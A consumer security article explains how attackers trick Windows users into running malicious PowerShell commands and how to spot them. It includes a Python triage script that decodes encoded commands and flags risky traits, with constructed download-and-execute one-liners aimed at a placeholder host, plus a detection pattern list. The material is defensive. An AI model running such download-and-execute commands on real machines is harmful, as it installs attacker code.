Windows PowerShell Could Allow Viruses to Infiltrate Undetected
Whenever a Windows tool has elevated access to a computer, someone is hot on the trail, trying to find a way to exploit it to run malware on other users' systems.
But what is PowerShell and how can it be abused?
What is PowerShell on Windows?
Windows PowerShell is an advanced configuration and automation tool. You can use it to execute commands to tweak your system or run automated scripts that perform complex tasks for you.
Because PowerShell has system permissions to change important settings on your PC or run system-sensitive scripts, bad guys will find ways to get it to execute malicious code. But before we get into how it can be abused, it's important to note that PowerShell itself isn't a malicious application. It's a core part of Windows that can't be disabled.
What makes PowerShell so dangerous?
When a bad actor wants to abuse PowerShell, they typically do one of two things: trick people into executing malicious code in PowerShell themselves, or create a file that runs a malicious script when it is opened.
Malicious actors convince people to run commands
First, let's look at when a malicious actor tricks someone into running a PowerShell command. This tactic typically involves scaring the victim into believing they need to run a PowerShell command to fix a non-existent problem.
One such tactic, The Register reports, involves bad actors hacking into legitimate websites and modifying them to display fake error messages. The error claims that something is wrong with the user's copy of Windows, Google Chrome, Office, or OneDrive, and to fix the "problem" it tells the user to run a PowerShell command.
Of course, the provided code doesn't fix anything. Instead, it tells PowerShell to connect to an external server, download a malicious executable, and run it. One instance of this attack used PowerShell to download a dropper, which then downloaded five other strains of malware onto the target PC.
Another variation of this 'user-triggered' PowerShell attack has been spotted being sent via email. The email includes an HTML file designed to look like Microsoft Word. When opened, it claims that it cannot display information in the Word document because an extension has stopped working. The user is then asked to copy-paste malicious code into PowerShell to fix the error or download a malicious file that does the job for the attacker.
Malicious file uses PowerShell to run fileless malware
A scarier version of the PowerShell attack uses fileless malware against the target. Here PowerShell performs the malicious tasks without writing any files to the victim's PC. Because nothing is saved to disk, file-scanning antivirus software has nothing to inspect, which makes the infection difficult to find and remove.
This attack method often disguises the Windows shortcut (LNK) file that carries the malicious script as some other kind of file. In the illegal movie example, the LNK file was made to look like a video file to trick people into opening it.
How to Avoid PowerShell Attacks
The difficulty in avoiding PowerShell attacks is that some legitimate fixes also require you to type commands into PowerShell. So before you type a command, take your time and consider how trustworthy its source is.
If you are looking for a fix and a reputable, trustworthy website says you should use a command, then you can run that command. If the command instead comes from a fake error message designed to scare you, running it will cause damage.
If you see a command and aren't sure what it does, try searching for it online. If it's useful, you'll see results from other people recommending it. If you don't find anything (or even see someone reporting it as malicious), then it's probably not a good idea to run it.
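Searching online is the right first step, but the copied text can also be examined locally before anything is run. The following triage helper is an added example for this article, not tooling from the original page: it decodes any `-EncodedCommand` payload (PowerShell expects base64 of UTF-16LE text) so the hidden command can be read, and then flags the traits the fake-fix attacks described above rely on, namely downloading content, executing text straight from memory, hiding the console window and switching off the execution policy. The sample commands, the `INDICATORS` table and the host `example.invalid` are all constructed for illustration.

```python
"""Triage a PowerShell one-liner you have been told to paste.

Added example, not code from the original article. Sample commands are
constructed and use the non-resolvable host example.invalid.
"""
import base64
import re

# Traits a wary user should understand before running a command (constructed list).
INDICATORS = {
    "downloads content": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient"
        r"|Start-BitsTransfer|\b(?:iwr|curl|wget)\b", re.I),
    "executes text in memory": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "launches a program": re.compile(r"Start-Process|\.exe\b", re.I),
    "hides its window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "disables execution policy": re.compile(
        r"-e(?:p|x|xec|xecutionpolicy)\s+bypass", re.I),
    "skips the user profile": re.compile(r"-nop\b|-noprofile\b", re.I),
}

# -EncodedCommand and its accepted abbreviations, followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(command: str):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent."""
    match = ENCODED_RE.search(command)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return "<undecodable payload>"


def analyze(command: str) -> dict:
    """Decode, scan for risky traits and give a plain-language verdict."""
    decoded = decode_encoded_command(command)
    # Scan the visible command line with the base64 blob removed (so random
    # base64 characters cannot trigger a pattern) plus the decoded text.
    text = ENCODED_RE.sub("-EncodedCommand <decoded>", command)
    if decoded is not None:
        text += "\n" + decoded
    findings = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if decoded is not None:
        findings.insert(0, "hides its real command behind base64")
    if "downloads content" in findings and (
            "executes text in memory" in findings or "launches a program" in findings):
        verdict = "do not run: downloads and executes remote code"
    elif findings:
        verdict = "review: unusual traits for a user-typed fix"
    else:
        verdict = "no red flags found (still confirm the source)"
    return {"decoded": decoded, "findings": findings, "verdict": verdict}


def encode_for_powershell(script: str) -> str:
    """Build an -EncodedCommand payload the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples, not taken from any real incident.
BENIGN = "Get-ChildItem -Recurse | Measure-Object"
FAKE_FIX = ("powershell -nop -w hidden -ep bypass -c "
            "\"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/fix.ps1')\"")
HIDDEN = "powershell -enc " + encode_for_powershell(
    "Invoke-WebRequest http://example.invalid/tool.exe -OutFile $env:TEMP\\tool.exe; "
    "Start-Process $env:TEMP\\tool.exe")

if __name__ == "__main__":
    for label, cmd in [("benign", BENIGN), ("fake fix", FAKE_FIX), ("encoded", HIDDEN)]:
        report = analyze(cmd)
        print(f"[{label}] {report['verdict']}")
        for finding in report["findings"]:
            print("   -", finding)
        if report["decoded"]:
            print("   decoded:", report["decoded"])
```

The benign directory listing produces no findings, while both constructed fake-fix commands are classed "do not run" because they combine a download with execution. The decoded text of the encoded sample is printed so the user can see what the blob actually asked PowerShell to do; a command that needs to hide itself this way is already a reason not to run it.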
If you accidentally fall victim to a PowerShell attack, you can try to find the best antivirus programs to remove the malware. However, as mentioned earlier, PowerShell attacks will do their best to stay undetected. If you notice anything unusual after running a PowerShell command, it is best to reinstall your operating system to ensure everything is clean.
PowerShell is a handy tool that gives you advanced control over your PC. However, some bad guys try to trick people into using it for the wrong purposes. Fortunately, if you stay alert, you can avoid being attacked.